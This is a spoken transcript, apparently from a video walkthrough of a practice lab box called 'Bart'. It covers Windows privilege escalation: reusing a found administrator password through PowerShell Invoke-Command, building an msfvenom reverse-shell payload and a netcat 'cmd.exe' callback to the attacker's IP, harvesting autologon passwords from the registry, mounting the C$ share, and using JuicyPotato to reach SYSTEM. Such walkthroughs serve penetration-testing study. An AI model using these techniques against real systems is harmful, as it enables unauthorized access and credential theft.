create this cred file. So we can just mention this as credential. That's it, as simple as that. Credential, username is over here. Again, we need to make sure you do this thing properly, otherwise it will error out. Just be careful of the codes always when you try to copy paste things from the internet. You have this username, you can enter two things over here. You can just enter something like, if you just do who am I, we are over here as okay, anti-authority, but we can enter Bart and /administrator, or you can just enter local and administrator over here. So this is what we can do over here, because that password was for administrator user, right? And this password we need to change it. We need to have the same thing for this cred, because this entire whatever value it does, right, it will be saved in this variable. This variable will then be called over here, so then it will create a credential file using this particular thing. So let's just try to copy this thing, paste it. Oh, no error. That's it, no error at all. Okay, next thing is invoke command using credential. Let's just try to see this invoke command credential. So there are multiple things present over here to actually run this invoke command. In short, we now created that credential file. Now we'll try to create a actual script. You know, you can use this particular thing, but we'll have to modify it a bit. So let's just try to copy this, paste it over here. We need to change this computer name to localhost itself, because we are just running that on localhost. Credential file, we can run it from here or give it in the end, I guess. And over here we need to change this credential to this particular thing over here. So let's just try to copy this, override this thing over here, because this is the file which we have created. We'll supply it over here, the variable, and over here it says script block. So I'll just try to keep it simple, and I'll just try to run who am I over here. That's it. If we get administrator, always keep things simple. Don't try to run for shells or something. Keep it simple first. Try to do this. If we get administrator over here, that means our credential is working, and we do get administrator over here. That means our credential is actually working, and this is a valid credential, and we can actually get, we already have root access almost. Obviously, we need to get a shell for that. So we do have this thing present. Now there are few ways you can try to escalate your privilege, since this is valid. I know that this particular credential is valid. Now we get few things what we can do over here. First thing is we can try to create an MSF Venom payload. Okay, so we'll just try to create that in this SMB share. MSF Venom P switch for payload. Then create it from Windows x64 because it's a 64-bit operating system. And then later on, yeah, shell reverse TCP, and then later on you give the L host, that is your attack machine's IP address 10.10.14.19, L port, that is 5555.4444 is in use. You can give different port than that, and then later on the file type, that is exe, output to reverse exe. We'll just try to do that. It may take some time, and for that, before that, we'll just try to rename this particular thing. Try to run a command. I think using SMB share, this thing was giving some error. It says that it cannot execute, but let's just try to see. We'll just try to create a cat 5555 to get a shell over here. We do have this reverse shell payload present. We'll just try to execute that over here. So we'll just try to do, and See, this is what happens, and this is what I hate, the quotes. Okay, so we'll just try to run something like 10 10 14 19 shared reverse.exe. We'll just try to run this. We'll just change this thing over here. Oh, okay, let's just try to run this particular command and see if this thing works. But I think it running it directly from SMB, it's gonna give some error because I did try it, I guess, last time. Let's just see if this thing comes. Not found share. Oh, my bad. Usually I just enter shared when I'm doing the box by myself at the start, so my bad. Share not found. Try to run this, authenticated it successfully. We do get this reverse exe file over here. Hopefully this thing runs as administrator user, and hopefully we get a shell. Let's see. The file has already gone and we do get a shell. Okay, so no error over here, and it actually closed out. So that's why actually this is what I was speaking about. Yeah, so it did close out eventually very quickly. So what we can do is we'll just try to transfer this file, okay, and to the attack machine over here. So we can use copy item, I guess. Copy item, we need to give this location. In PowerShell it's a bit different. You need to use this copy item thing. Control B. And then the destination, I guess. So I'll just give reverse exe. I hope it copies over here itself. Unknown level. Okay, we do have this reverse exe now over here. So we need to give this entire path. We'll just copy this, update our command over here, and then give reverse exe. Copy this thing. I'm not sure why there are many spaces over here, but yeah, I don't think that matters. But try to set up that catalyst there again. Go on top, paste this thing. Hopefully we get a reverse shell now, which is stable. It says did not contain. Okay, so this is what I was speaking about. So I think we can do invoke command, computer name, script block. Invoke command start process, I guess. We'll just try for that. Start process exe. Start process. Let's just try to do that start process thing and see if this thing actually works. Start process. Oh, that's been deleted already, I guess. Okay. Hope this thing works. If not, then we'll just try to do it with NC itself. At times, obviously, there are different boxes, few or the other things may happen. I just hope this thing starts and we get a shell, stable shell, and it does not crash again. If it does crash, we'll just try to use NC and try to get the shell, because that definitely works. Just wait for a bit. Till then, we'll just try to locate the NC. Locate NC exe. This file is already present. Windows resources binary NC exe file. It's already present in a Kali machine. You can take that, or you can just do nc64exe Google search and try to download that, and then try to copy it. Let's just see if we get something. For now, this thing is stuck over here, but no shell as of now. Closing down connection. Okay, never mind. Let's just try to use NC over here. Probably we'll have to terminate this shell over here. This thing is already stuck. Try to do this, send that thing again from burp suite, get the shell. We do have this shell again over here. We'll probably have to create this particular thing again, the command. Let's just try to do that quickly. Try to do this. Okay, now we do have this multiple things and the credential object present. We'll just try to modify this thing over here, and we'll just try to use something like, and we'll just use NC, and then we'll give the parameters, that is, we need to give the IP address 10.10.14.19.5555. We can give the e-switch and cmd.exe. So let's just try to do this, and this should actually work. So let's just see. Try to run this thing. 555 is waiting over here. Hope we get a shell. Come on. Yeah, so we do get a shell over here, and if we do who am I, we are over here as administrator. Sometimes you actually that the reverse shell thing would work or would not work, and it would delete that file because it would consider it to be harmful or something like that. So probably you can use NC, or you can use the same PowerShell command again and try to get that. So we'll just try to go back to desktop, and we can get the root flag over here. Another thing is there are multiple users present over here, right? So we can just try to use something like cmd.c where our c users user.txt. Try to find this file and see if we get it over here. Get done quickly. Yeah, so we do get the file over here in users hporter user.txt. So obviously we can very well read the file because we are over here as administrator. We could read our root text. So obviously we can read this particular file as well. Obviously it's gonna check for other directories over here. So yeah, this thing is done. We just got this administrator shell. There are a few things I want to show in this particular box. So I'll just try to terminate this. Hope I get the shell back over here. Come on, come on. Come on. Okay, I'll just try to terminate this and try to create this thing again. Just try to close this for now, and what we'll try to do is we'll just try to get a shell first. Send this request. Okay, so we do have the shell. So we'll just try to check for few things over here, and one thing is we'll just try to use this particular fuzzy security list, and we'll just try to copy this command. We'll just try to run this. It may take some time. It will give us multiple outputs, so we'll just try to close this. We do have multiple password things present over here, and we can check for passwords over here. Those are that the autologon passwords, and obviously you can do a find string for default password or something like that. But this thing, obviously it's like in registry, if there are any plain text passwords, it's going to actually give you that. So this is what the Z query is running. The interesting thing over here is the match over here, the 262 matches found. Okay, so this is done. And another thing is the environment over here. I think it's running 32-bit PowerShell. Okay, so that's the reason. I think you can do it with environment is 64-bit process. It says false. So that means it's not 64-bit process, the PowerShell. So that's why this particular thing is actually running, you know, this command, a rich query command, as 32-bit. It's not running as 64-bit. So eventually we'll miss out few things. And I'll just show you a different way. So we'll just try to check for 64-bit Windows 64-bit PowerShell. Let's try 64-bit PowerShell. We do get this thing. Okay, so over here, I think so. Okay, so this is where it explains, and it says that, you know, syswow lets you execute 32-bit system commands from 64-bit code, and sysnative lets you execute 64-bit with this particular system executable. So this is nothing but system root, that is C Windows. We can try adding this, but I think it will give you an error. So we'll just try to copy this thing over here. We can just do add, you know, something like Windows, sysnative, nothing but Windows. I hope that backward slash does not create an issue. So you can do this, and then you can do something like who am I over here in quotes, probably, if you can do that. Who am I? Trying to run PowerShell again, but we're trying to run this 64-bit PowerShell. Okay, so now if I try to run this along with this environment thing, it says true over here. So that means this PowerShell is actually 64-bit PowerShell, because it says true over here, it says false over here. So this is one thing what we can do. And another thing is, let's just try to copy this entire thing. Get this fuzzy security thing over here, the reg query, register query. So this is nothing but we are doing a register query over here. I hope you all know what registers are in Windows. So we'll just try to run this again and make sure, like, see, look at this 262. So we'll just try to run this thing again and see if we get something interesting or some additional information. Till this thing runs, we can even check for autologon grids in register PowerShell. Can probably check for this. Okay, so this is done, and now we have 389 matches found. That means we had 262 earlier, now we got 389. We did get additional entries, and we can just, you know, check and go through each one of these, but I'll just scroll through it quickly. And if we go, yeah, just keep scrolling, keep scrolling, keep scrolling. We see something like a default password over here for this particular reg query, and we do have this password present over here, which is the same as this particular thing present here. So this was done nothing but using this winpeas. So winpeas actually created that 64-bit process, I guess. That's why we used a 64-bit winpeas, right? So it actually helped us, but sometimes we may get stuck. So please ensure that, you know, you can use 64-bit and 32-bit PowerShell to do things. This we had seen in one of the previous boxes as well, where we needed to execute a 64-bit you know, exploit. So we had to use this particular 64-bit PowerShell as well. So keep that in your cheat sheet as well, so that you all don't miss out on things in the future. So this is one thing over here, and I think we can do a reg query over here and try to see if you get something. Let's just try to do a reg query over here. Query. Oh, we had to actually give the codes over here. That's the reason it was not working, but we'll just try to do this. Okay, and we need to run it obviously as that PowerShell 64-bit version. My bad. This thing is messed up, so just try to copy paste this thing again. Did we close it? See, Windows, and try to run this thing over here, and then try to run this query. Probably give this code. Okay, try to run this thing, and I'm not sure why it gave us an error now. Okay, for some reason I don't know, I'm not sure, but I'm not able to run this thing. Direct query. Did we have a different version over here? Software, Microsoft NT, current version, when log on. Local machine. Okay, so the same thing, HKLM. Okay, never mind. I think I'm not sure why this thing is not running, but let's just give a last try with query. Not sure why this is coming, but okay, so we did get it finally. So because of the codes, it was messing up, and this is what we get. We do get, the reason for that is I just wanted to show you all the administrator ID which is being showed. The default password is showed. Obviously it can be for multiple users, right? I just want to show the administrator password as well. So this is what the administrator password, sorry, the user name is, the administrator. That's why we get the username, and that's how winpeas actually got it. It's over here as well, default username. So this is what we got, and we did get the password as well. So this is what I wanted to show you all using 64-bit thing. And obviously we took some time over here for the codes, but yeah, eventually we did find it over here. And now since we had this creds, right, so we can obviously check and try to get a reversal using NC or something. And also what we can do is we can just try to, you know, since now we are as this iusr itself, we can just try to add this try to create, or you know, put your SMB share. Okay, another thing, in winpeas we missed out that, but we can just quickly check this. SMB is probably running over here because of this particular port 4455. So this is probably running, and what we can do is we can just quickly go and try to load this entire C share to a different drive like Z. So let's just try to do that. How to mount C share to C drive. How to mount SMB share as another user Windows, because we have to do it as another user, right? So probably we'll have to give a different username. Let's close these things, don't require it. more. This is for mount. To mount. Net use must include net use. Okay, so this is what it looks like. Accessing, this is what I was looking for, and you can use this command over here as another user. So we'll have to modify it a bit. So we'll just add this thing. Drive letter we can give any, we'll just give Z. We'll give the server name. So server name is nothing but your local host. You can add 127 as well, but for some reason it gave me an error. So let's just try to add localhost over here. Give the share name as C, and this is what the C drive share looks like. We'll give this share name. It says user, that is the domain and the username. So domain we can leave it as local probably, or we can just give Bart, because that's what the host name is. So we'll just give Bart over here. We'll give the administrator, sorry, user as administrator. We'll give the password as this password which we did find. We don't have to keep that this thing present over there. Okay, persistent, yes, I'm not sure what it is for, but since we got it from here and highly rated as well, so we'll just try to use this and see. Now if we just try to show, if we just go to the Z drive, it will say that does not exist. So let's just try to do this. My bad. Why not? Okay, access denied, and then later on. So now let's just go to Z drive. We do have this thing, Z drive. We actually are as iusr. Okay, I just want to show y'all can go to the administrator directory. I can write some files for schedule jobs, something like that, and get a shell eventually. So I'm just saying this is one way you can get it. We are over here as cd, my bad, cd desktop. We can get the root text over here. So this is one way you can do it. And another way, since obviously we did find multiple ways, right? So we can do the JuicyPotato exploit as well. That will do it quickly because we have done it in the previous boxes as well. But yeah, so if we just do who am I over here, we are over here as this. We just do who am I, we have the privileges over here, SeImpersonate privilege. So we'll just try to take this and try to create that token using JuicyPotato. Before that, if you all don't know where to get the files from, go to JuicyPotato. This is, okay, my bad. Let's just go to the repository first. The file is present over here. It's a bit sneaky to get because it's not present over here as download. You have to go over here, click on this, and then you have to get this JuicyPotato file. So we do have JuicyPotato over here. Locate JuicyPotato. We do have this file. I already have it in my system, so I'm not going to download it again. And I do have it in the SMB share. Now what I need to do is I need to run using JuicyPotato. We can run the reverse shell actually, I guess. So we do have this reverse exe created, right? So we need to run few commands over here. Where did the image go? Yeah, there's a command which says you need to run JuicyPotato and you need to give this L. So quickly what we'll do is we'll craft this payload just to be safe. We'll quickly craft it. I'll just zoom a bit so that it is visible. Okay, so we need to give the JuicyPotato part first. So I'll just probably give in PowerShell. So I'll just run this as this, and over here I'll just give quotes 10.10.14.19 mutated nuts, and then I'll be giving JuicyPotato.exe. I just hate this code, so I hope there's some way to disable that. I'm not sure, I have to figure it out. But yeah, So we do have this, then we give the L, that is there's some port present over. You can see the usage in the previous page over here, which says, where did this come out? Port where it will listen to. So that's what I'll just give it 1337. Just keep it default if nothing works out, so we can probably change it then. Then we need to give the P switch for the program to execute. So we can give P over here, and then again we can give the shared drive name, I guess 10.10.14.19. We'll just give the reverse exe which we did create earlier, right? So we'll give that over here, and then later on we can give the T switch over here for all. Just make sure you give the asterisk so that it creates both. Try both. You can try either of those. So just to be safe, try to create that. And C is actually optional. We'll just see what happens if we try to run C first. Sorry, we just try to run this without C first. So let's just try to copy this entire thing. We'll just set up a netcat listener first. NCNVLP 5555. Try to create this, run this. We did get the connection over here, SMB. We just got something, right? Just wait and see if we get something. If it failed, it will actually say a token could not be created over here. So it's good enough to actually let us know that it was not successful. Let's probably wait for this. And it says failed with error. So probably that CLID, the default CLID, was used over here. There's a default CLID, so that is not useful for us. So for our OS, which we saw was Windows 10, if you just do system info quickly, we are over here as Windows 10 Pro. So we need to create a CLID for that. It's very much zoomed in. Where was the CLID? JuicyPotato. CLIDs. Windows 10 Pro. Pro is professional. Sorry, we have multiple XBL game save and all this kind of things, which is system access. You can try these one by one. So I'll just quickly grab this thing and I'll just try to paste it in my cherry command. See, sometimes when you're trying to do things again and again, I prefer keeping it in some mousepad or cherry the command so that I can copy paste things. Like we had seen earlier for this, right? We had some issues running this, so we didn't have to type it manually. It saves time, that's it. Okay, so we do have this C thing. We'll just add this in quotes because at times it does not run. It will give you an error. So make sure you put that in quotes. It does not mention in the GitHub repository, but yeah. Let's just try running this and see if this thing actually works. We get some token or something created or no. We just added the C switch with that CLID for Windows 10 Pro. So let's see if this thing works. Probably takes some time for this thing to execute, and it says created process with token, failed to create process. Okay, for some reason it could not create this particular. Okay, this is a reverse, I guess. My bad. I missed out on that. I think I'll have to give obviously reverse.exe. It happens at times. The video is any which way long, so yeah, obviously the first thing would not work any which way. We just tried and it did not work, right? It was not because of this, it was because of that CLID, because it said that failed to create the token. Here it said it was successful to create a token plus, but the process was not created. That means the file name which I gave was wrong. And if obviously I minimized this thing, otherwise I would have gotten the error over here which says not found or something like that. So let's just wait for this thing and see if this thing comes, and we do get a shell over here. If I do who am I, we are over here as system, so we can go and grab a root flag, user flag as well. So this was the box, a bit long. It was a bit tricky for the user part, at least for this particular part. Also it was a bit tricky, but winpeas would help us, and at times winpeas does not run, so always know how to run things manually. Take reference of things like this fuzzy security page over here, add it to your checklist and everything. So make sure you all do that. And yeah, so this was the box. First we actually tried to add, you know, domains and subdomains to our host file. We tried to get access to a particular server monitor application using the username and surname as password. So we use that, and then after that we got some internal chat. We got some link over there where we could do log poisoning. We actually wrote something, PHP command to get log poisoning done over here. We did get RC, we did get shell, PowerShell over here. We did find administrator creds and escalator are privileged. Also we did see and check out this JuicyPotato exploit using SeImpersonate Token. So yeah, this was the box. If you guys like the video, do give a thumbs up, and if you all have any queries, do ask me in the comments below. So thank you.